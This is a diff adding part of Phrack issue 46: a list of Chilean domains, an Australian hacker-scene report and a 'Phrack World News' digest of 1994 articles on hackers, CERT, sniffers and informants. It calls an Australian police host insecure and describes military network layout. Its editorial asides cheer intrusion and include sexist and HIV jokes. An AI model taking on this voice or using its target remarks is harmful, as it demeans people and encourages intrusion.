+ingenac.cl (ingenac pedor de valdivia, idencia, santiago, chile)
+lascar.cl (university of catolica, chile)
+mic.cl (las condes, santiago, chile)
+ncr.cl (national cash register corporation, chile)
+opta.cl (opta limiteda. las violetas, idencia, santiago, chile)
+orden.cl (orden huerfanos piso, fax, santiago, chile)
+placer.cl (placer dome) <--- WHAT IS THIZ??? "Pleasure dome?" !!!!!!!!!!
+puc.cl (catholic university of chile (universidad catolica de chile)
+rimpex.cl (rimpex chile pedro de valdivia, casilla, correo santiago, chile)
+safp.cl (superintendencia de administradoras de fondos de pensiones, chile)
+scharfs.cl (scharfstein, las condes, santiago, chile)
+sisteco.cl (sisteco, santiago, chile)
+sonda.cl (sonda digital teatinos, santiago, chile)
+tes.cl (d.c.c. sistemas, chile)
+uai.cl (unspecified)
+ubiobio.cl (unspecified)
+uchile.cl (universidad de chile)
+ucv.cl (unspecified)
+udec.cl (universidad de concepcion de ingenieria de sistemas,)
+unisys.cl (unisys, chile)
+unorte.cl (universidad del norte, antofagasta, chile)
+usach.cl (universidad de santiago de chile de ingenieria informatica,)
+uta.cl (universidad de tarapaca, arica, chile)
+utfsm.cl (universidad tecnica de electronica, valparaiso, chile)
+ac.cam.cl (unspecified)
+agr.puc.cl (agriculture department, catholic university of chile
+astro.puc.cl (catholic university of chile (pontificia universidad catolica
+bio.puc.cl (catholic university of chile santiago)
+cec.uchile.cl (universidad de chile)
+cfm.udec.cl (universidad de concepcion, concepcion, chile)
+dcc.uchile.cl (department o. de ciencias de la computacion)
+dfi.uchile.cl (universidad de chile)
+die.udec.cl (universidad de concepcion de ingenieria de sistemas)
+dii.uchile.cl (universidad de chile)
+dim.uchile.cl (universidad de chile)
+dis.udec.cl (universidad de concepcion, concepcion, chile)
+disca.utfsm.cl (universidad tecnica federico santa maria, chile)
+dpi.udec.cl (universidad de concepcion de ingenieria de sistemas)
+elo.utfsm.cl (universidad tecnica federico santa maria, )
+finanzas.fundch.cl (fundacion, chile)
+fis.utfsm.cl (universidad tecnica federico santa maria,)
+inf.utfsm.cl (universidad tecnica federico santa maria,)
+ing.puc.cl (engineering, catholic university of chile )
+mat.puc.cl (mathematics department, catholic university of chile
+mat.utfsm.cl (universidad tecnica federico santa maria,
+qui.puc.cl (catholic university of chile  santiago)
+seci.uchile.cl (universidad de chile)
+soft.udec.cl (universidad de concepcion de ingenieria de sistemas,)
+-----------------------------------------------------------------------------
+
+Australian Scene Report Part II
+by Data King
+-------------------------------
+
+This is the sequel to the Australian scene report that appeared in Phrack
+Issue 45. There have been a few developments since I wrote that report which I
+think people may be interested in.
+
+Old NEWS
+~~~~~~~~
+But first before I deal with what's new, I need to deal with something that's
+old. Shortly after Phrack 45 was published, I received a fakemail that
+basically threatened me and also made a lot of claims, I would like to take
+this opportunity to reply to the author of this letter.
+
+First of all this person claims I have not been in the scene for ages, well
+if I am not in the scene that is news to me!
+
+The letter contained several threats to do something like redirect my
+telephone number to a 0055 number, for people outside of Australia, a 0055
+is a recorded timed call service.
+
+To this I say: 'Go ahead, if your capable DO IT!'
+
+I wont bother dealing with most of the rubbish contained in the article, it
+was just general BS.
+
+Finally I have something to say directly to the person who wrote the mail:
+"If your so goddamn good, then don't hide behind fakemail, come out in the
+open and let us all fear you, come one get your lame ass on IRC and lets talk!"
+
+Also I was told not to submit anything more to Phrack for publishing or bad
+things would happen, Well I guess either I have no phear, or I don't take
+these threats seriously.
+
+
+New NEWS
+~~~~~~~~
+AusCERT
+
+Australia is forming it's own version of CERT, to be called AusCERT and
+based in Queensland, Australia. Everybody is shaking in their boots worrying
+- NOT!
+
+Networks
+
+In the last report you may remember I talked about the Australia Military
+Network in a very vague fashion, well now I have some more detailed info for
+you.
+
+The Australian Defense Forces (ADF) have what they call "the Defense
+Integrated Secure Communications Network (DISCON)". This network is
+relatively new. Circuit switched operations only began in 1990. Packet
+switching came into effect during 1992.
+
+It provides all the ADF's communication needs in terms of data, voice,
+video, and so on, secure and non secure communications.
+
+Main control is exercised from Canberra (believed to be from within the DSD
+compound at Russell Offices), and the network is interconnected via a total
+of 11 ground stations across the country using Aussat.
+
+Also the Australian Federal Police have an internet connection now.
+sentry.afp.gov.au is the main machine from what I can tell, from the looks
+of it, the machine is either a setup or they don't know much about security.
+
+NeuroCon
+
+There was a Con organized by The Pick held here in Melbourne a little while
+ago, from all reports it was a total disaster, once again showing the apathy
+of Australian people in the scene.
+
+For Instance the organizers kept the location secret, and where supposed to
+pick people up in the city, at several allocated times they did not show up.
+
+When one of the potential attendees rang and asked what was going on they
+were told by the organizers: "We are too drunk to come and get you".
+
+Come on guys this is LAME, sure everyone likes a drink, but if you keep the
+location secret, make sure someone is able to go and get the people waiting
+to be picked up!
+
+HackFEST 94
+
+The Year is quickly approaching an end and as yet I have not managed to
+fully organize this event. I am in need of people who wish to speak on various
+topics, so if you are so inclined and have an idea, send me mail and we will
+see what we can organize.
+
+As always I can be contacted at dking@suburbia.apana.org.au, but please note
+my PGP signature has changed, so please do a finger on the account if you want
+my new PGP signature.
+
+Information in this article has come from various sources, but they shall
+remain nameless as they do not wish the attention of the AFP. They know who
+they are, and I send them my thanks - Thanks Guys!
diff --git a/phrack46/28.txt b/phrack46/28.txt
new file mode 100644
index 0000000..1f9fa48
--- /dev/null
+++ b/phrack46/28.txt
@@ -0,0 +1,790 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Six, File 28 of 28
+
+              PWN PWN PNW PNW PNW PNW PNW PNW PNW PNW PNW PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN        Compiled by Datastream Cowboy        PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+Damn The Torpedoes                                            June 6, 1994
+~~~~~~~~~~~~~~~~~~
+by Loring Wirbel (Electronic Engineering Times) (Page 134)
+
+On May 3, a gargantuan satellite was launched with little press coverage
+from Cape Canaveral.
+
+The $1.5 billion satellite is a joint project of the NSA and the
+National Reconnaissance Office.  At five tons, it is heavy enough to
+have required every bit of thrust its Titan IV launcher could
+provide--and despite the boost, it still did enough damage to the
+launch-pad water main to render the facility unusable for two months.
+
+The satellite is known as Mentor, Jeroboam and Big Bertha, and it has an
+antenna larger than a football field to carry out "hyper-spectral
+analysis" -- Reconnaissance Office buzzwords for real-time analysis of
+communications in a very wide swath of the electromagnetic spectrum.
+
+Clipper and Digital Signature Standard opponents should be paying
+attention to this one.  Mentor surprised space analysts by moving into a
+geostationary rather than geosynchronous orbit.  Geostationary orbit
+allows the satellite to "park" over a certain sector of the earth.
+
+This first satellite in a planned series was heading for the Ural
+Mountains in Russia at last notice.  Additional launches planned for
+late 1994 will park future Mentors over the western hemisphere.
+
+According to John Pike of the Federation of American Scientists, those
+satellites will likely be controlled from Buckley Field (Aurora,
+Colorado), an NSA/Reconnaissance downlink base slated to become this
+hemisphere's largest intelligence base in the 1990s.
+
+[Able to hear a bug fart from space.  DC to Daylight realtime analysis.
+ And you Clipper whiners cry about someone listening to your phone calls.
+ Puh-lease.]
+
+-----------------------------------------------------------------------------
+
+Discovery of 'Data Processing Virus Factory' In Italy       February 17, 1994
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+AFP Sciences
+
+It was learned in Rome on 10 February that a data processing virus
+"factory" -- in fact, a program called VCL (Viruses Creation Laboratory),
+capable of triggering a virus epidemic--was discovered in Italy
+
+Mr. Fulvio Berghella, deputy directory-general of the Italian Institute
+for Bank Data Processing Security (ISTINFORM), discovered what it takes
+to enable just about anybody to fabricate data processing viruses; he told
+the press that its existence had been suspected for a year and a half and
+that about a hundred Italian enterprises had been "contaminated."
+
+An investigation was launched to try to determine the origin of the program,
+said Mr. Alessandro Pansa, chief of the "data processing crime" section
+of the Italian police.  Several copies of VCL were found in various places,
+particularly in Rome and Milan.
+
+Producing viruses is very simple with the help of this program, but it is
+not easy to find.  A clandestine Bulgarian data bank, as yet not identified,
+reportedly was behind all this.  An international meeting of data processing
+virus "hunters" was organized in Amsterdam on 12 February to draft
+a strategy; an international police meeting on this subject will be held
+next week in Sweden.
+
+Since 1991, the number of viruses in circulation throughout the world
+increased 500% to a total of about 10,000 viruses.  In Italy, it is not
+forbidden to own a program of this type, but dissemination of viruses
+is prosecuted.
+
+[So, I take it Nowhere Man cannot ever travel to Italy?]
+
+--------------------------------------------------------------------------
+
+DEFCON TV-News Coverage                                      July 26, 1994
+by Hal Eisner (Real News at 10) (KCOP Channel 13 Los Angeles)
+
+[Shot of audience]
+
+Female Newscaster: "Hackers are like frontier outlaws. Look at what Hal
+   Eisner found at a gathering of hackers on the Las
+   Vegas strip."
+
+[Shot of "Welcome to Vegas" sign]
+[Shot of Code Thief Deluxe v3.5]
+[Shot of Dark Tangent talking]
+
+Dark Tangent:           "Welcome to the convention!"
+
+[Shot of Voyager hanging with some people]
+
+Hal Eisner:             "Well not everyone was welcome to this year's
+                        Def Con II, a national convention for hackers.
+                        Certainly federal agents weren't."
+
+[Shot DTangent searching for a fed]
+
+Dark Tangent:           "On the right.  Getting closer."
+
+Fed:                    "Must be me!  Thank you."
+
+[Dark Tangent gives the Fed "I'm a Fed" t-shirt]
+
+Hail Eisner:            "Suspected agents were ridiculed and given
+                        identifying t-shirts. While conventioneers, some of
+[Shot of someone using a laptop]
+                        which have violated the law, and many of which are
+[Shot of some guy reading the DefCon pamphlet]
+                        simply tech-heads hungry for the latest theory, got
+[Shot of a frequency counter, and a scanner]
+                        to see a lot of the newest gadgetry, and hear some
+                        tough talk from an Arizona Deputy DA that
+[Shot of Gail giving her speech]
+                        specializes on computer crime and actually
+                        recognized some of her audience."
+
+Gail:                   "Some people are outlaws, crooks, felons maybe."
+
+[Shot back of conference room. People hanging]
+
+Hal Eisner:             "There was an Alice in Wonderland quality about all
+                        of this. Hackers by definition go where they are not
+                        invited, but so is the government that is trying to
+                        intrude on their privacy."
+
+Devlin:                 "If I want to conceal something for whatever reason.
+                        I'd like to have the ability to."
+
+Hal Eisner:             "The bottom line is that many of the people here
+                        want to do what they want, when they want, and how
+                        they want, without restrictions."
+
+Deadkat:                "What we are doing is changing the system, and if you
+                        have to break the law to change the system, so be it!"
+
+Hal Eisner:             "That's from residents of that cyberspacious world
+[Shot of someone holding a diskette with what is supposed to be codez on the
+label]
+                        of behind the computer screen where the shy can be
+[Code Thief on the background]
+                        dangerous.  Reporting from Las Vegas, Hal Eisner,
+                        Real News.
+
+------------------------------------------------------------------------------
+
+Cyber Cops                                                        May 23, 1994
+~~~~~~~~~~
+by Joseph Panettieri (Information Week) (Page 30)
+
+When Chris Myers, a software engineer at Washington University in
+St. Louis, arrived to work one Monday morning last month, he realized
+something wasn't quite right.  Files had been damaged and a back door
+was left ajar.  Not in his office, but on the university's computer network.
+
+Like Commissioner Gordon racing to the Batphone, Myers swiftly called the
+Internet's guardian, the Computer Emergency Response Team (CERT).
+
+The CERT team boasts impressive credentials.  Its 14 team members are
+managed by Dain Gary, former director of corporate data security at
+Mellon Bank Corp. in Pittsburgh.  While Gary is the coach of the CERT
+squad, Moira West is the scrambling on-field quarterback.  As manager
+of CERT's incident-response team and coordination center, she oversees
+the team's responses to attacks by Internet hackers and its search for
+ways to reduce the Internet's vulnerabilities.  West was formerly a
+software engineer at the University of York in England.
+
+The rest of the CERT team remains in the shadows.  West says
+the CERT crew hails from various information-systems backgrounds,
+but declines to get more specific, possibly to hide any Achilles'
+heels from hackers.
+
+One thing West stresses is that CERT isn't a collection of reformed
+hackers combing the Internet for suspicious data.  "People have to
+trust us, so hiring hackers definitely isn't an option," she says.
+"And we don't probe or log-on to other people's systems."
+
+As a rule, CERT won't post an alert until after it finds a
+remedy to the problem.  But that can take months, giving hackers
+time to attempt similar breakins on thousands of Internet hosts
+without fear of detection.  Yet CERT's West defends this policy:
+"We don't want to cause mass hysteria if there's no way to
+address a new, isolated problem.  We also don't want to alert the
+entire intruder community about it."
+
+------------------------------------
+Who You Gonna Call?
+How to reach CERT
+
+Phone: 412-268-7090
+Internet: cert@cert.org
+Fax: 412-268-6989
+Mail: CERT Coordination Center
+      Software Engineering Institute
+      Carnegie Mellon University
+      Pittsburgh, PA 15213-3890
+------------------------------------
+
+[Ask for that saucy British chippie.  Her voice will melt you like
+ butter.
+
+ CERT -- Continually re-emphasizing the adage:  "You get what you pay for!"]
+
+ And remember, CERT doesn't hire hackers, they just suck the juicy bits
+ out of their brains for free.
+
+------------------------------------------------------------------------------
+
+Defining the Ethics of Hacking                                 August 12, 1994
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Amy Harmon (Los Angeles Times) (page A1)
+
+Eric Corley, a.k.a Emmanuel Goldstein -- patron saint of computer
+hackers and phone phreaks -- is having a party.
+
+And perhaps it is just in time. 2600, the hacker magazine Corley
+started when he was 23, is a decade old. It has spawned monthly
+hacker meetings in dozens of cities. It has been the target of a
+Secret Service investigation. It has even gone aboveground, with
+newsstand sales of 20,000 last year.
+
+As hundreds of hackers converge in New York City this weekend to celebrate
+2600's anniversary, Corley hopes to grapple with how to uphold the
+"hacker ethic," an oxymoron to some, in an era when many of 2600's devotees
+just want to know how to make free phone calls.  (Less high-minded
+activities -- like cracking the New York City subway's new electronic
+fare card system -- are also on the agenda).
+
+Hackers counter that in a society increasingly dependent on
+technology, the very basis for democracy could be threatened by limiting
+technological exploration. "Hacking teaches people to think critically about
+technology," says Rop Gonggrijp, a Dutch hacker who will attend the Hackers
+on Planet Earth conference this weekend. "The corporations that are building
+the technology are certainly not going to tell us, because they're trying to
+sell it to us. Whole societies are trusting technology blindly -- they just
+believe what the technocrats say."
+
+Gonggrijp, 26, publishes a magazine much like 2600 called Hack-Tic,
+which made waves this year with an article showing that while tapping mobile
+phones of criminal suspects with radio scanners, Dutch police tapped into
+thousand of other mobile phones.
+
+"What society needs is people who are independent yet knowledgeable,"
+Gonggrijp said. 'That's mostly going to be young people, which society is
+uncomfortable with. But there's only two groups who know how the phone and
+computer systems work, and that's engineers and hackers. And I think that's
+a very healthy situation."
+
+[By the way Amy:  Phrack always grants interviews to cute, female
+ LA Times reporters.]
+
+------------------------------------------------------------------------------
+
+Fighting Telephone Fraud                                        August 1, 1994
+~~~~~~~~~~~~~~~~~~~~~~~~
+by Barbara DePompa (Information Week) (Page 74)
+
+Local phone companies are taking an active role in warning customers of
+scams and cracking down on hackers.
+
+Early last month, a 17-year old hacker in Baltimore was caught
+red-handed with a list of more than 100 corporate authorization codes that
+would have enabled fraud artists to access private branch exchanges and
+make outgoing calls at corporate expanse.
+
+After the teenager's arrest, local police shared the list with Bell
+Atlantic's fraud prevention group. Within hours, the phone numbers were
+communicated to the appropriate regional phone companies and corporate
+customers on the list were advised to either change their authorization
+codes or shut down outside dialing privileges.
+
+"We can't curb fraud without full disclosure and sharing this type
+of vital information" points out Mary Chacanias, manager of
+telecommunications fraud prevention for Bell Atlantic in Arlington, VA.
+
+-----------------------------------------------------------------------------
+
+AT&T Forms Team to Track Hackers                              August 30, 1994
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+(Reuters News Wire)
+
+AT&T Corp.'s Global Business Communications Systems subsidiary said
+Wednesday it has formed an investigative unit to monitor, track and
+catch phone-system hackers in the act of committing toll fraud.
+
+The unit will profile hacker activity and initiate "electronic
+stakeouts" with its business communications equipment in cooperation
+with law enforcement agencies, and work with them to prosecute the
+thieves.
+
+"We're in a shoot-out between 'high-tech cops' -- like AT&T -- and
+'high-tech robbers' who brazenly steal long distance service from our
+business customers," said Kevin Hanley, marketing director for business
+security systems for AT&T Global Business.
+
+"Our goal is not only to defend against hackers but to get them off the
+street."
+
+[Oh my God.  Are you scared?  Have you wet yourself?  YOU WILL!]
+
+-----------------------------------------------------------------------------
+
+Former FBI Informant a Fugitive                                 July 31, 1994
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Keith Stone (Daily News)
+
+Computer outlaw Justin Tanner Petersen and prosecutors
+cut a deal:  The Los Angeles nightclub promoter known in
+the computer world as "Agent Steal" would work for the
+government in exchange for freedom.
+
+With his help, the government built its case against
+Kevin Lee Poulsen, a Pasadena native who pleaded guilty
+in June to charges he electronically rigged telephones at
+Los Angeles radio stations so he could win two Porsches,
+$22,000 and two trips to Hawaii.
+
+Petersen also provided information on Kevin Mitnick, a
+Calabasas man wanted by the FBI for cracking computer and
+telephone networks at Pacific Bell and the state Department
+of Motor Vehicles, according to court records.
+
+Petersen's deal lasted for nearly two years - until
+authorities found that while he was helping them undercover,
+he also was helping himself to other people's credit cards.
+
+Caught but not cornered, the 34-year-old "Agent Steal" had
+one more trick: He admitted his wrongdoing to a prosecutor
+at the Los Angeles U.S. Attorney's Office, asked to meet
+with his attorney and then said he needed to take a walk.
+
+And he never came back.
+
+A month after Petersen fled, he spoke with a magazine for
+computer  users about his role as an FBI informant, who he
+had worked against and his plans for the future.
+
+"I have learned a lot about how the bureau works.  Probably
+too much," he said in an interview that Phrack Magazine published
+Nov. 17, 1993.  Phrack is available on the Internet, a worldwide
+network for computer users.
+
+Petersen told the magazine that working with the FBI was fun
+most of the time.  "There was a lot of money and resources used.
+In addition, they paid me well," he said.
+
+"If I didn't cooperate with the bureau," he told Phrack, "I
+could have been charged with possession of government material."
+
+"Most hackers would have sold out their mother," he added.
+
+Petersen is described as 5 foot, 11 inches, 175 pounds, with
+brown hair - "sometimes platinum blond."  But his most telling
+characteristic is that he walks with the aid of a prosthesis
+because he lost his left leg below the knee in a car accident.
+
+Heavily involved in the Hollywood music scene, Petersen's
+last known employer was Club "Velvet Jam," one of a string of
+clubs he promoted in Los Angeles.
+
+-----------------------------------------------------------------------------
+
+Hacker in Hiding                                                July 31, 1994
+~~~~~~~~~~~~~~~~
+by John Johnson (LA Times)
+
+First there was the Condor, then Dark Dante.  The latest computer hacker to
+hit the cyberspace most wanted list is Agent Steal, a slender, good-looking
+rogue partial to Porsches and BMWs who bragged that he worked undercover
+for the FBI catching other hackers.
+
+Now Agent Steal, whose real name is Justin Tanner Petersen, is on the run
+from the very agency he told friends was paying his rent and flying him to
+computer conferences to spy on other hackers.
+
+Petersen, 34, disappeared Oct. 18 after admitting to federal prosecutors
+that he had been committing further crimes during the time when he was
+apparently working with the government "in the investigation of other
+persons," according to federal court records.
+
+Ironically, by running he has consigned himself to the same secretive life
+as Kevin Mitnick, the former North Hills man who is one of the nation's most
+infamous hackers, and whom Petersen allegedly bragged of helping to set up
+for an FBI bust.  Mitnick, who once took the name Condor in homage to a
+favorite movie character, has been hiding for almost two years to avoid
+prosecution for allegedly hacking into computers illegally and posing as a
+law enforcement officer.
+
+Authorities say Petersen's list of hacks includes breaking into computers
+used by federal investigative agencies and tapping into a credit card
+information bureau.  Petersen, who once promoted after-hours rock shows in
+the San Fernando Valley, also was involved in the hacker underground's most
+sensational scam - hijacking radio station phone lines to win contests with
+prizes ranging from new cars to trips to Hawaii.
+
+Petersen gave an interview last year to an on-line publication called Phrack
+in which he claimed to have tapped the phone of a prostitute working for
+Heidi Fleiss.  He also boasted openly of working with the FBI to bust
+Mitnick.
+
+"When I went to work for the bureau I contacted him," Petersen said in the
+interview conducted by Mike Bowen.  "He was still up to his old tricks, so
+we opened a case on him. . . . What a loser.  Everyone thinks he is some
+great hacker.  I outsmarted him and busted him."
+
+In the Phrack interview, published on the Internet, an international network
+of computer networks with millions of users, Agent Steal bragged about
+breaking into Pacific Bell headquarters with Poulsen to obtain information
+about the phone company's investigation of his hacking.
+
+Petersen was arrested in Texas in 1991, where he lived briefly.  Court
+records show that authorities searching his apartment found computer
+equipment, Pacific Bell manuals and five modems.
+
+A grand jury in Texas returned an eight-count indictment against Petersen,
+accusing him of assuming false names, accessing a computer without
+authorization, possessing stolen mail and fraudulently obtaining and using
+credit cards.
+
+The case was later transferred to California and sealed, out of concern for
+Petersen's safety, authorities said.  The motion to seal, obtained by
+Sherman, states that Petersen, "acting in an undercover capacity, currently
+is cooperating with the United States in the investigation of other persons
+in California."
+
+In the Phrack interview, Petersen makes no apologies for his choices in life.
+
+While discussing Petersen's role as an informant, Mike Bowen says, "I think
+that most hackers would have done the same as you."
+
+"Most hackers would have sold out their mother," Petersen responded.
+
+------------------------------------------------------------------------------
+
+Computer Criminal Caught After 10 Months on the Run            August 30, 1994
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Keith Stone (Daily News)
+
+Convicted computer criminal Justin Tanner Petersen was captured Monday in
+Los Angeles, 10 months after federal authorities said they discovered he
+had begun living a dual life as their informant and an outlaw hacker.
+
+Petersen, 34, was arrested about 3:30 a.m. outside a Westwood apartment
+that FBI agents had placed under surveillance, said Assistant U.S.
+Attorney David Schindler.
+
+A flamboyant hacker known in the computer world as "Agent Steal," Petersen
+was being held without bail in the federal detention center in Los Angeles.
+U.S. District Court Judge Stephen V. Wilson scheduled a sentencing hearing
+for Oct. 31.
+
+Petersen faces a maximum of 40 years in prison for using his sophisticated
+computer skills to rig a radio contest in Los Angeles, tap telephone lines
+and enrich himself with credit cards.
+
+Monday's arrest ends Petersen's run from the same FBI agents with whom he
+had once struck a deal: to remain free on bond in exchange for pleading
+guilty to several computer crimes and helping the FBI with other hacker
+cases.
+
+The one-time nightclub promoter pleaded guilty in April 1993 to six federal
+charges.  And he agreed to help the government build its case against Kevin
+Lee Poulsen, who was convicted of manipulating telephones to win radio
+contests and is awaiting trial on espionage charges in San Francisco.
+
+Authorities said they later learned that Petersen had violated the deal by
+committing new crimes even as he was awaiting sentencing in the plea
+agreement.
+
+On Monday, FBI agents acting on a tip were waiting for Petersen when he parked
+a BMW at the Westwood apartment building.  An FBI agent called Petersen's
+name, and Petersen began to run, Schindler said.
+
+Two FBI agents gave chase and quickly caught Petersen, who has a prosthetic
+lower left leg because of a car-motorcycle accident several years ago.
+
+In April 1993, Petersen pleaded guilty to six federal charges including
+conspiracy, computer fraud, intercepting wire communications, transporting
+a stolen vehicle across state lines and wrongfully accessing TRW credit
+files.  Among the crimes that Petersen has admitted to was working with other
+people to seize control of telephone lines so they could win radio
+promotional contests.  In 1989, Petersen used that trick and walked away with
+$10,000 in prize money from an FM station, court records show.
+
+When that and other misdeeds began to catch up with him, Petersen said, he
+fled to Dallas, where he assumed the alias Samuel Grossman and continued
+using computers to make money illegally.
+
+When he as finally arrested in 1991, Petersen played his last card.
+"I called up the FBI and said: 'Guess what? I am in jail,' " he said.
+He said he spent the next four months in prison, negotiating for his freedom
+with the promise that he would act as an informant in Los Angeles.
+
+The FBI paid his rent and utilities and gave him $200 a week for spending
+money and medical insurance, Petersen said.
+
+They also provided him with a computer and phone lines to gather information
+on hackers, he said.
+
+Eventually, Petersen said, the FBI stopped supporting him so he turned to
+his nightclubs for income.  But when that began to fail, he returned to
+hacking for profit.
+
+"I was stuck out on a limb.  I was almost out on the street.  My club
+was costing me money because it was a new club," he said.  "So I did what
+I had to do.  I an not a greedy person."
+
+[Broke, Busted, Distrusted.  Turning in your friends leads to some
+ seriously bad Karma, man.  Negative energy like that returns ten-fold.
+ You never know in what form either.  You could end getting shot,
+ thrown in jail, or worse, test HIV Positive.  So many titty-dancers,
+ so little time, eh dude?  Good luck and God bless ya' Justin.]
+
+-----------------------------------------------------------------------------
+
+Fugitive Hacker Baffles FBI With Technical Guile                 July 5, 1994
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by John Markoff (New York Times)
+
+[Mitnik, Mitnik, Mitnik, and more Mitnik.  Poor bastard.  No rest for
+ the wicked, eh Kevin?]
+
+-----------------------------------------------------------------------------
+
+Computer Outlaws Invade the Internet                             May 24, 1994
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Mike Toner (Atlanta Journal-Constitution)
+
+A nationwide wave of computer break-ins has law enforcement
+authorities scrambling to track down a sophisticated ring of
+"hackers" who have used the international "information
+highway," the Internet, to steal more than 100,000 passwords -- the
+electronic keys to vast quantities of information stored on
+government, university and corporate computer systems.
+
+Since the discovery of an isolated break-in last year at a
+single computer that provides a "gateway" to the Internet,
+operators of at least 30 major computer systems have found illicit
+password "sniffers" on their machines.
+
+The Federal Bureau of Investigation has been investigating the
+so-called "sniffer" attacks since February, but security experts
+say the intrusions are continuing -- spurred, in part, by the
+publication last month of line-by-line instructions for the
+offending software in an on-line magazine for hackers.
+
+Computer security experts say the recent rash of password piracy
+using the Internet is much more serious than earlier security
+violations, like the electronic "worm" unleashed in 1988 by
+Cornell University graduate student Robert Morris.
+
+"This is a major concern for the whole country," she says.
+"I've had some sleepless nights just thinking about what could
+happen. It's scary. Once someone has your ID and your password,
+they can read everything you own, erase it or shut a system down.
+They can steal proprietary information and sell it, and you might
+not even know it's gone."
+
+"Society has shifted in the last few years from just using
+computers in business to being absolutely dependent on them and the
+information they give us -- and the bad guys are beginning to
+appreciate the value of information," says Dain Gary, manager of
+the Computer Emergency Response Team (CERT), a crack team of
+software experts at Carnegie-Mellon University in Pittsburgh that
+is supported by the Defense Department's Advanced Research Projects
+Agency.
+
+Gary says the current rash of Internet crime appears to be the
+work of a "loosely knit but fairly organized group" of computer
+hackers adept not only at breaking and entering, but at hiding
+their presence once they're in.
+
+Most of the recent break-ins follow a similar pattern. The
+intruders gain access to a computer system by locating a weakness
+in its security system -- what software experts call an "unpatched
+vulnerability."
+
+Once inside, the intruders install a network monitoring program,
+a "sniffer," that captures and stores the first 128 keystrokes
+of all newly opened accounts, which almost always includes a user's
+log-on and password.
+
+"We really got concerned when we discovered that the code had
+been published in Phrack, an on-line magazine for hackers, on April
+1," he says. "Putting something like that in Phrack is a little
+like publishing the instructions for converting semiautomatic
+weapons into automatics.
+
+Even more disturbing to security experts is the absence of a
+foolproof defense. CERT has been working with computer system
+administrators around the country to shore up electronic security,
+but the team concedes that such "patches" are far from perfect.
+
+[Look for plans on converting semiautomatic weapons into automatics
+ in the next issue.]
+------------------------------------------------------------------------------
+
+Information Superhighwaymen - Hacker Menace Persists                  May 1994
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+(Open Computing) (Page 25)
+
+Once again the Internet has been labeled a security problem.  And a new
+breed of hackers has attracted attention for breaking into systems.
+"This is a group of people copying what has been done for years," says
+Chris Goggans, aka Erik Bloodaxe.  "There's one difference:  They don't
+play nice."
+
+Goggans was a member of the hacker gang called the Legion of Doom in the
+late '80s to early '90s.  Goggans says the new hacking group, which goes
+by the name of "The Posse," has broken into numerous Business Week 1000
+companies including Sun Microsystems Inc., Boeing, and Xerox.  He says
+they've logged onto hundreds of universities and online services like
+The Well.  And they're getting root access on all these systems.
+
+For their part, The Posse--a loose band of hackers--isn't talking.
+
+------------------------------------------------------------------------------
+
+Security Experts:  Computer Hackers a Growing Concern            July 22, 1994
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+New York Times News Wire (Virginian-Pilot and Ledger Star) (2A)
+
+Armed with increasing sophisticated snooping tools, computer programmers
+operating both in the United States and abroad have gained unauthorized
+access to hundreds of sensitive but unclassified government and military
+computer networks called Internet, computer security experts said.
+
+Classified government and military data, such as those that control
+nuclear weapons, intelligence and other critical functions, are not
+connected to the Internet and are believed to be safe from the types of
+attacks reported recently.
+
+The apparent ease with which hackers are entering military and government
+systems suggests that similar if not greater intrusions are under way on
+corporate, academic and commercial networks connected to the Internet.
+
+Several sources said it was likely that only a small percentage of
+intrusions, perhaps fewer than 5 percent, have been detected.
+
+------------------------------------------------------------------------------
+
+NSA Semi-confidential Rules Circulate
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By Keay Davidson (San Francisco Examiner) (Page A1)
+
+It arrived mysteriously at an Austin, Texas, post office box by "snail
+mail" - computerese for the Postal Service.  But once the National Security
+Agency's employee handbook was translated into bits and bytes, it took
+only minutes to circulate across the country.
+
+Thus did a computer hacker in Texas display his disdain for government
+secrecy last week - by feeding into public computer networks the
+semiconfidential document, which describes an agency that, during the darkest
+days of the Cold War, didn't officially "exist."
+
+Now, anyone with a computer, telephone, modem and basic computer skills
+can read the 36-page manual, which is stamped "FOR OFFICIAL USE ONLY" and
+offers a glimpse of the shadowy world of U.S. intelligence - and the personal
+price its inhabitants pay.
+
+"Your home, car pool, and public places are not authorized areas to
+conduct classified discussions - even if everyone involved in the discussion
+possesses a proper clearance and "need-to-know.' The possibility that a
+conversation could be overheard by unauthorized persons dictates the need to
+guard against classified discussions in non-secure areas."
+
+The manual is "so anal retentive and paranoid. This gives you some
+insight into how they think," said Chris Goggans, the Austin hacker who
+unleashed it on the computer world. His on-line nom de plume is "Erik
+Bloodaxe" because "when I was about 11, I read a book on Vikings, and that
+name really struck me."
+
+NSA spokeswoman Judi Emmel said Tuesday that "apparently this document is
+an (NSA) employee handbook, and it is not classified."    Rather, it is an
+official NSA employee manual and falls into a twilight zone of secrecy. On
+one hand, it's "unclassified." On the other hand, it's "FOR OFFICIAL USE
+ONLY" and can be obtained only by filing a formal request under the U.S.
+Freedom of Information Act, Emmel said.
+
+"While you may take this handbook home for further study, remember that
+it does contain "FOR OFFICIAL USE ONLY' information which should be
+protected," the manual warns. Unauthorized release of such information could
+result in "appropriate administrative action ... (and) corrective and/or
+disciplinary measures."
+
+Goggans, 25, runs an on-line electronic "magazine" for computer hackers
+called Phrack, which caters to what he calls the "computer underground." He
+is also a computer engineer at an Austin firm, which he refuses to name.
+
+The manual recently arrived at Goggans' post office box in a white
+envelope with no return address, save a postmark from a Silicon Valley
+location, he says. Convinced it was authentic, he typed it into his computer,
+then copied it into the latest issue of Phrack.
+
